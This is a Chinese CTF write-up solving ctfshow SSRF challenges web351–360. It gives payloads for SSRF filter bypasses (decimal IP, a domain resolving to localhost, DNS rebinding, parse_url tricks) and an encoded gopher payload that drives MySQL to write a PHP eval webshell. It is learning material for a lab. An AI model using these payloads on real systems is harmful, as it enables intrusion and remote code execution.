ctfshow SSRF web351-web360 wp
文章目录
- 认识SSRF
- web351
- web352
- web353
- web354
- web355
- web356
- web357
- web358
- web359、web360
认识SSRF
浅谈SSRF漏洞
SSRF详解
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
web351
可以访问flag.php页面,访问后提示非本地用户禁止访问,所以要用ssrf来本地访问
url=http://localhost/flag.php
web352
依旧是flag.php,但过滤了127.0.0.1和localhost。使用ip转数字
在线IP地址转Int数字、Int数字转IP地址
url=http://2130706433/flag.php
web353
/localhost|127\.0\.|\。/i
不影响之前的payload
url=http://2130706433/flag.php
web354
/localhost|1|0|。/
专门过滤了1和0。
找到一个A记录是127.0.0.1(http://sudo.cc/),然后把那个网站域名改成payload里的url
url=http://sudo.cc/flag.php
web355
这里要求strlen($host)<=5
在百度127.0.0.1又可写成什么的时候,我发现了这个本机ip、127.0.0.1和0.0.0.0区别
既然全零地址是表示任意主机,我就想试一下0是不是可以代表0.0.0.0
然后尝试本地访问一下http://0/,他给我跳转到了https://0.0.0.0/
这样来说应该可以,于是尝试构造payload,成功
url=http://0/flag.php
web356
这一次(strlen($host)<=3),那就用上面的payload
url=http://0/flag.php
web357
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {die('ip!');
}echo file_get_contents($_POST['url']);
}
else{die('scheme');
}
if判断里的:
- FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP
- FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP
- FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP (比如 192.168.0.1)
- FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。
DNS重绑定(DNS-Rebinding)漏洞:浅谈DNS重绑定漏洞
去http://ceye.io/注册一个账号,登录后会看到分配了一个域名
添加个DNS Rebinding为任意ip,再添加一个为127.0.0.1,否则payload打过去会直接显示127.0.0.1 ip!
然后POST:(记得在分配的域名前面加个r.)
url=http://r.xxxxxx.ceye.io/flag.php
然后多POST几次就可以了
web358
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){echo file_get_contents($url);
}
这里的考到的是parse_url解析问题,参考文章:parse_url小结
http://ctf.@0/flag.php?show
web359、web360
打无密码的mysql
这里用之前做代码审计的时候用到的工具gopherus(https://github.com/tarunkant/Gopherus)
写一句话进去
然后找一下传参的点
这里有个点是需要再对gopher://127.0.0.1:3306/_后面的进行url编码,我就就直接用记事本替换了(把%替换成%25)
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%2520%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501
然后打returl
web360打redis,把工具后面的mysql改成层redis即可
记得再url编码一次。
ctfshow SSRF web351-web360 wp相关推荐
- ctfshow SSRF web351~360
web 351 知识点:http伪协议访问内网文件 用http伪协议访问内网的flag.php,或者利用file伪协议读取flag.php的源码. url=http://127.0.0.1/flag. ...
- CTFShow“萌心区”WP(上)
CTFShow "萌心区"WP详解(上) 萌新认证 萌新_密码1 萌新_密码2 萌新_密码3 萌新_密码4 隐写1 隐写2 萌新_隐写2 萌新_隐写3 萌新_隐写4 萌新_隐写5 ...
- ctfshow—2023愚人杯wp
ctfshow-2023愚人杯wp 热身 热身 100 愚人杯比赛秉承欢乐.有爱.进取的精神 在群里师傅热心帮助下,已经开始第三届比赛啦! 欢迎各位师傅参加,希望大家玩的开心,比赛题目可以自由讨论.但 ...
- CTFshow SSRF
目录 CTFshow SSRF 前言 简介 危害 利用方式 web351-无过滤 web352-过滤localhost和127.0.0.1和url的[scheme] IP地址进制转换 本地回环的其他表 ...
- CTFshow SSRF(web351-360)
目录 web351 思路 题解 web352 思路 题解 web353 web354 思路 题解 web355 思路 题解 web356 思路 题解 web357 思路 题解 web358 思路 题解 ...
- CTFshow_Web_SSRF——web351~web360(除354、357)
文章目录 前言 一.知识点 Ⅰ.SSRF攻击点 Ⅱ.gopher协议 二.题解 web351 web352.353 web355 web356 web358 web359 web360 完 前言 35 ...
- CTFshow 击剑杯 部分WP
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...
- ctfshow sql注入 web171-web253 wp
文章目录 参考文章 sql注入 web171 web172 web173 web174 web175 解法一 解法二 web176 web177 web178 web179 web180-web182 ...
- CTFshow单身杯 部分wp
前言:不会吧不会吧不会有人520521不约会打比赛吧 文章目录 1.单身杯热身题目 2.misc签到 3.没大没小的串串 4.任性老板 5.蛤壳雪茄-1 6.蛤壳雪茄-2 7.The Dancing ...
最新文章
- HBase 1.1.2 优化插入 Region预分配
- windows 系统监视器 以及建议阀值
- java web 自定义标签_JavaWeb学习——自定义标签
- java 数组处理_JAVA操作数组
- mysql 8 免安装版 下载及配置
- cuda-gdb 调试python中的module/cu文件
- 3dmax蒙皮详细教程
- Java面试题及答案整理(2021最新版)
- 观察:家乡的、身边的真实互联网
- 阿里云存储开通与使用
- java根据出生年月计算年龄
- 备案的是域名还是服务器?
- QuerySet,本质上是一个给定的模型的对象列表
- 天文观测理论——已知像素大小、焦距,求像素分辨率
- 保护FTP和SFTP服务器的10个基本技巧
- 中国大数据分析行业研究报告
- 589. N 叉树的前序遍历(javascript)589. N-ary Tree Preorder Traversal
- QT-磨砂玻璃效果实现
- Unitary matrix 幺正矩阵
- 从零在FPG上实现OFDM(一)